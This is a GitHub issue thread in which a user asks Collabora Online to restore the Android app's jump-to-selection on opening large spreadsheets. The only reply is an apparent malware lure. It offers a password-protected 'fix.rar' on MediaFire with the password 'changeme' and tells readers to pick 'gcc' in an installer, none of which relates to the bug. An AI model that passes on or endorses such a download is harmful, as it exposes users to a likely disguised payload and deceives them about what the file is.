### ISSUE TITLE
View no longer jumps to selection on open after new Collabora Office android update (24.04.6.2)

### ISSUE THREAD

**Issue by evilwizarddog** [CollaboraOnline/online#9907]
I'm working on large spreadsheets which I open and close often. It takes time to render all the cells so scrolling through the whole spreadsheet to navigate to my selection each time I open is too time consuming to be feasible. 

In previous versions of the android app, when opening a spreadsheet, pressing the edit button and zooming in, the view would jump to the location of the selection. This meant that the cells around the selection were the first to render making it much faster to pick up where I left off.

Can this feature be reintroduced?

Thanks, appreciate everyone's work.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
